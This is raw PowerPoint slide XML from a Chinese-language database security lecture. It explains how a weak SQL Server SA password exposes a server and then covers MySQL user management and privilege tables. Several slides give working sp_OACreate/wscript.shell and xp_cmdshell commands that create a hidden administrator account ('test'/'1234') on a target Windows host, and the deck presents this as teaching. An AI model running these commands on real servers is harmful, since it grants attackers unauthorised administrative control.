              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>， </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sp_OASetProperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sp_OAStop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，使用方法：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>DECLARE @shell INT EXEC SP_OACREATE '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>wscript.shell',@shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> OUTPUT </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>EXEC SP_OAMETHOD @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>shell,'run',null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>, 'c:\WINNT\system32\cmd.exe /c net user test </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1234 /add'--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>　　这样对方系统增加了一个用户名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，密码为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1234</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的用户，再执行：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>DECLARE @shell INT EXEC SP_OACREATE '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>wscript.shell',@shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> OUTPUT </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>EXEC SP_OAMETHOD @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>shell,'run',null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>, 'c:\WINNT\system32\cmd.exe /c net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>localgroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>administrators test /add '--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>　　用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，被加入管理员组。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>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存储过程利用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="912052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endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A2D3A97-2F09-4A37-B319-616183C3074B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1853208"/>
            <a:ext cx="10972800" cy="4384104"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>存储过程是存储在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>SQLServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>中的预先写好的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>语句集合，其中危险性最高的扩展存储过程就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>了，它可以执行操作系统的任何指令，而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>SA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>Microsoft </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>SQLServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的管理员帐号，拥有最高权限，它可以执行扩展存储过程，并获得返回值，比如执行：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>exec master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> 'net user test 1234 /add'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>exec master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> 'net </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>localgroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> administrators test /add'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>　　这样对方的系统就被添加了一个用户名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，密码为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1234</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，有管理员权限的用户</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="内容占位符 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D62EA788-20A3-47D8-87FA-5EE09C78556D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="11331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b="1" dirty="0"/>
              <a:t>SA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>弱口令带来的安全隐患</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1209994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en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>是一个开放源代码的、开源的关系型数据库管理系统（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>DBMS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>），广泛应用在互联网上等中小型网站开发中。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>MySQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>是一个真正的多用户、多线程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>数据库服务器，它是一个客户机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>服务器结构的实现。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>是现在流行的关系数据库中其中的一种，相比其它的数据库管理系统（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>DBMS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>）来说，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>具有小巧、功能齐全、查询迅捷等优点</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介绍</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2106012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en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>是一个多用户数据库，具有功能强大的访问控制系统，可以为不同用户指定允许的权限。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>用户可以分为普通用户和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>用户。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>Root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>用户是超级管理员，拥有所有权限，包括创建用户、删除用户和修改用户的密码等管理权限；普通用户只拥有被授予的各种权限。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>用户管理包括管理用户账户、权限等。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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用户管理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="532902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marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>提供许多语句用来管理用户帐号，这些语句可以用来管理包括登录和退出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>服务器、创建用户、删除用户、密码管理和管线管理等内容</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>登录：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> –h localhost –u root –p test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>（用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>用户登录到本地</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>服务器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>库）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>创建用户：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>create user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>test@localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>identified by ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>’;(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>创建一个用户，用户名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，主机名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>localhost)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，主机名部分为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>是对所有主机开放权限；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>删除用户：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>DROP USER ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>user@localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>                 DROP USER;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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用户管理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1680478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marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>服务器通过权限表来控制用户对数据库的访问，权限表存放在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>数据库中，由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mysql_install_db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>脚本初始化。存储账户权限信息表有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>tables_priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>columns_priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>procs_priv</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>User</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>表是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>中最重要的一个权限表，记录允许链接到服务器的帐号信息，权限是全局级的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>Db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>表中存储了用户对某个数据库的操作权限，决定用户能从哪个主机存取哪个数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
